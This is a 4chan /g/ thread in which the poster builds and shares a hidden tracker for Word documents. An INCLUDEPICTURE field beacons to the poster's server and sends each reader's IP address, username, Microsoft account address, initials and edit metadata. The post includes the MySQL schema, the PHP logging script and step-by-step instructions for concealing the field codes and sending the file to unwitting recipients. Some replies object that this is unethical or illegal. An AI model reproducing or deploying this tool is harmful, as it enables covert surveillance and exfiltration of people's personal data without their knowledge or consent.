Hey /g/, i'm writing a report for my education and i would like to track who reads, edits, prints, etc. it.
i already made a kind of tracking pixel that's working and i'm able to embed it into the word file, i tested it and it contacts the server upon opening of the document.
Now i discovered that apart from INCLUDEPICTURE there are other word-fields like USERNAME and LASTSAVEDBY.
i should (not tested) be able to use these in the includepicture URL.
I'm looking into somehow escaping/encoding the strings so they don't trip up my server or the db.
I was wondering, how legal/ethical is this and how will normies perceive it when they catch my tracker (alt+F9)?
Hints and tips regarding development are appreciated, i will share the code along the way
Very unethical as they don't give permission to be tracked.
Also, why don't you use Google Docs or something, there you can see who views it etc?
>>52434654
botnet
op
thefuck
neet
erf
this
>>52434684
I'm not tracking, i'm logging the requests to my webserver.
Information like last save date and username is metadata and by using microsoft office you are allowing documents to access that info.
I also host the images remotely to decrease file size on disk and in emails (most have 50mb inbox).
As far as permission goes, my document contains this text:
{INCLUDEPICTURE \d "url?u={USERNAME \* MERGEFORMAT}" \* MERGEFORMATINET}
I think it should be their responsibility to disabled auto-loading/interpreting of remote images, if they didn't disable it i see it as them making the request and not my document.
>b-b-but i can't disable it!
Well, you should've used viewer that could.
No google docs because i need to submit it as a file and it needs to work offline.
>>52434810
Relax, it's only metadata, mostly.
I've seen this thread before AND all of the replies so far. Either you're samefagging hard or I'm dejavuing hard.
>>52435937
Bruh, i'm not samefagging.
http://didyouknow.org/products/
I have not seen another thread about this, could you link me to some archive?
Did the other OP work out a POC and if yes, can i see it?
>>52435894
>Relax, it's only metadata, mostly.
>we kill people based on metadata
>>52435894
The NSA was only collecting metadata too.
>>52436374
>Errasse humanum est.
>>52436392
I know, that's why i said it.
>>52435937
>i've seen this thread before
>not providing link
this is why you should never trust doc/pdf/anything
aside from the tracking pixel, I don't understand how this works OP but it looks impressive
>>52436951
It includes a php page as a pic, the php page returns a picture.
it gives the $_GET variable to the php page which logs it into the DB.
The username in the URL *should* work like this but it doesn't.
Everything in a smaller fontsize is an example of the metadata i can log.
I'm stuck at using the {USERNAME} in the url, if i get past that i think i can do it.
>>52437077
Literally within 2 minutes of posting this i got past the {USERNAME} in the URL.
I really hope the viewer doesn't press ALT+F9, he knos some programming languages and will know what it is.
Hopefully word blocks ALT+F9 if the document is marked final, is protected against editing and has a digital signature.
MySQL Database structure.
SQL:CREATE TABLE IF NOT EXISTS `tracker_data` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
`ip_string` text COLLATE utf8_bin,
`ip_long` bigint(20) unsigned NOT NULL,
`last_saved_by` text COLLATE utf8_bin,
`print_date` text COLLATE utf8_bin,
`user_name` text COLLATE utf8_bin,
`user_address` text COLLATE utf8_bin,
`user_initials` text COLLATE utf8_bin,
`save_date` text COLLATE utf8_bin,
`rev_num` int(10) unsigned NOT NULL,
`edit_time` text COLLATE utf8_bin,
`author` text COLLATE utf8_bin,
`tag` text COLLATE utf8_bin,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin AUTO_INCREMENT=1 ;
>>52437701
I realize no-one is lurking here, but i'll share anyway
>>52437721
Fucking bugs, forgot a ? in the query.
This is fixed version:<?php
ob_start();
ini_set('display_erorrs',0);
$db=mysqli_connect('127.0.0.1','user','password','db');
$qr=$db->prepare('INSERT INTO `tracker_data` '.
'(`ip_string`,`ip_long`,`last_saved_by`,`print_date`,`user_name`,`user_address`,`user_initials`,`save_date`,`rev_num`,`edit_time`,`author`,`tag`) VALUES '.
'(?,?,?,?,?,?,?,?,?,?,?,?);');
$ip_string=$_SERVER['REMOTE_ADDR'];
$ip_long=ip2long($_SERVER['REMOTE_ADDR']);
$last_saved_by=$_GET['l'];
$print_date=$_GET['p'];
$user_name=$_GET['u'];
$user_address=$_GET['a'];
$user_initials=$_GET['i'];
$save_date=$_GET['s'];
$rev_num=$_GET['r'];
$edit_time=$_GET['e'];
$author=$_GET['c'];
$tag=$_GET['t'];
$qr->bind_param('sissssssisss',$ip_string,$ip_long,$last_saved_by,$print_date,$user_name,$user_address,$user_initials,$save_date,$rev_num,$edit_time,$author,$tag);
$qr->execute();
$qr->free_result();
$qr->close();
mysqli_close($db);
ob_end_clean();
header("Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate");
header("Expires: Wed, 11 Jan 2000 12:59:00 GMT");
//header("Last-Modified: Wed, 11 Jan 2006 12:59:00 GMT");
header("Pragma: no-cache");
header('Content-Type: image/png');
readfile('myImage.png');
exit();
>>52436243
>>52436786
Honestly I might be tripping. But it seems like I read the same thing a month ago
>>52437894
You ARE tripping because i coded this today, or someone else also invented it before me
>>52437927
Post word document Source photo URL structure pls
>>52437446
Why text and not varchar(255)?
![2016-01-15 19_04_37-bedrijfskundig stageverslag.docx [Compatibility Mode] - Word.png](https://i.imgur.com/SJu4oY0.png "2016-01-15 19_04_37-bedrijfskundig stageverslag.docx [Compatibility Mode] - Word.png")
>>52437844
How to deploy:
>execute sql to create table >>52437446
>make php page using php code >>52437844
>upload your image to server
>in word, goto INSERT tab and select FIELD (in Quick Parts dropdown)
>select INCLUDEPICTURE and enter the plain URL to the php page
>check Data not stored in document, optionally check the resize options.
>hit OK
>if you don't see strange field codes like the image, press ALT+F9 (google the shortcut for non-windows)
>place cursor at end of .php and add a ?
add info
>at the end of the url, add l=
>place the cursor just after the =
>insert another field, this time used the lastsavedby field
>tune format settings and confirm insert dialog
>Repeat adding info for the following combinations:
l lastsavedby
p printdate
u username
a useraddress
i userinitials
s savedate
r revnum
e edittime
c author
t (instead of a field place identification tag)
>press ALT+F9 to hide the stuff.
>press CTRL+S
>press CTRL+W
>press CTRL+O and select the document
>goto image place (where you placed the include picture and all the stuff)
>if you see code, right click and select toggle field codes until all gone
>save
>mark as final and digitally sign to prevent editing (and pray for word blocking ALT+F9 this way)
>send to normies
>get their IP's, username, microsoft account display name, microsoft account address (if set), ms account initials, and meta-data that show if they edited it after you.
YOU CANNOT TYPE THE STUFF OUT OF THE PIC, you need to manually add it field by field.
>>52438004
see this post
i was too lazy to enter 255 in the lenght field and i don't know how long it can be
>>52438141
i forgot, after the very last \* in the stuff you need to put MERGEFORMATINET
OP here, can someone confirm this is working?
It works for me but idk if it does for others
>>52438004
I'll manufactur a word .docx for you, wait 20 mins
>>52439289
I've decided to redesign the entire thing, what i posted earlier still works (if you deploy it on your own server).
>>52440987
I'm done with redesign.
I've created a test document and i'm handing it to a normie to test.
>>52434654
>escaping strings
in php using sqlite3 db I escape strings this way$username = SQLite3::escapeString($_GET[username])
check php documentation to find out how to use it with mysqli
>>52441749
With mysqli you don't need to escape the strings if you use the bind_param() method.
bind_param() does not just insert the string into the query, it actually passes the string into the field in the table.
It's SQL-injection proof, i tried it.
>>52441793
Wanted to add this also:
If you learn yourself to use bind_param() allthe time, you will never forget to escape the strings.
Pray that nobody from the EU opens your file because that kind of tracking has been made illegal last year.
>>52441793
>>52441814
Good to know. Thanks, fαm!
>>52441824
Sauce?
I'm in the EU and everyone who has received a copy of my tracker is aware of the tracking and consented to it.
AFAIK this is subject to mandatory anoy-ifications that read "To provide you better bullshit we use cookies/trackers"
>>52441848
http://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php
see 2. of the selected answer.
AFAIK this is THE way to do it, i always do it like this:$db=mysqli_connect("mainframe.fbi.gov","root","Password1!","myDB");
$data1=420;
$data2=419>$data1?"Too high!":"All fine";
$query=$db->prepare('INSERT INTO `table1` (`field1`,`field2`) VALUES (?,?);');
$query->bind_param(''ss",$data1,$data2);
$query->execute();
$query->free_result();
$query->close();
mysqli_close($db);
return "u fulin now it bitch";
How do you make your queries?
>>52441993
shit, i meant 219<$data1
